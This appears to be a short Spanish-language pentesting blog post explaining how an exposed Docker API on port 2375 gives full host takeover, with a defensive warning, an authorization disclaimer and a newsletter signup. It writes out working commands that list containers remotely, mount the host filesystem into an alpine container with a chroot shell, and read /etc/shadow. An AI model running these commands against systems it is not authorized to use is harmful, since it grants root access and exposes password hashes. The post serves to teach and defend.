~ / blog / pentesting
KALI

Docker API expuesta

Si un servidor deja la API de Docker abierta en el puerto dos tres siete cinco, es una toma total.

Con esa API, cualquiera puede crear un contenedor que monte todo el disco del anfitrión, y desde ahí leer o escribir cualquier archivo del sistema, incluido el de contraseñas. Con docker menos H apuntas a la IP y listas o creas contenedores.

Nunca expongas el socket de Docker a la red sin protección. Es equivalente a dar acceso root.

# los comandos

kali@kali:~$ docker -H tcp://10.0.0.5:2375 pscopiar
CONTAINER ID IMAGE STATUS
a1b2c3 nginx Up 3 days
kali@kali:~$ docker -H tcp://10.0.0.5:2375 run -v /:/host -it alpine chroot /host shcopiar
# cat /etc/shadowcopiar
root:$6$... (¡acceso total al host!)
Solo con permiso. Esto se muestra con fines educativos y defensivos: úsalo únicamente en sistemas propios o donde tengas autorización. Entender el ataque es lo que te permite defenderte de él.
root@cero: ~/newsletter
┌──(root@cero)-[~]
└─# suscribir --envio-semanal
un comando a la semana que te hace más difícil de hackear.
una sola herramienta, explicada en español claro, cada semana. lo mejor de los reels, directo a tu correo.
email =
sin spam. un correo a la semana. te sales cuando quieras.